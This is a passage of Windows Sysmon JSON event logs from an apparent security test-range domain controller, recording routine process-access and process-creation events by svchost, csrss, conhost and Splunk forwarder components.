C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.938","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1972,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.938\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.938","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1973,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.938\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.938","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1974,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.938\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.938","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1975,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.938\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01C8-5F25-0000-001067D90300}\r\nTargetProcessId: 3968\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.938","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01C8-5F25-0000-001067D90300}","TargetProcessId":"3968","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1976,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.947\r\nProcessGuid: {A837DB8D-01C8-5F25-0000-00101FDA0300}\r\nProcessId: 3992\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool validate-regex --log-warnings\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {A837DB8D-01C8-5F25-0000-001067D90300}\r\nParentProcessId: 3968\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" validate-regex --log-warnings","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.947","ProcessGuid":"{A837DB8D-01C8-5F25-0000-00101FDA0300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool validate-regex --log-warnings","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{A837DB8D-01C8-5F25-0000-001067D90300}","ParentProcessId":"3968","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" validate-regex --log-warnings","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1977,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.938\r\nSourceProcessGUID: {A837DB8D-01C8-5F25-0000-001067D90300}\r\nSourceProcessId: 3968\r\nSourceThreadId: 3972\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {A837DB8D-01C8-5F25-0000-00101FDA0300}\r\nTargetProcessId: 3992\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.938","SourceProcessGUID":"{A837DB8D-01C8-5F25-0000-001067D90300}","SourceProcessId":"3968","SourceThreadId":"3972","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{A837DB8D-01C8-5F25-0000-00101FDA0300}","TargetProcessId":"3992","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1978,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.938\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C8-5F25-0000-00101FDA0300}\r\nTargetProcessId: 3992\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.938","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C8-5F25-0000-00101FDA0300}","TargetProcessId":"3992","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1979,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.938\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.938","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1980,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.938\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 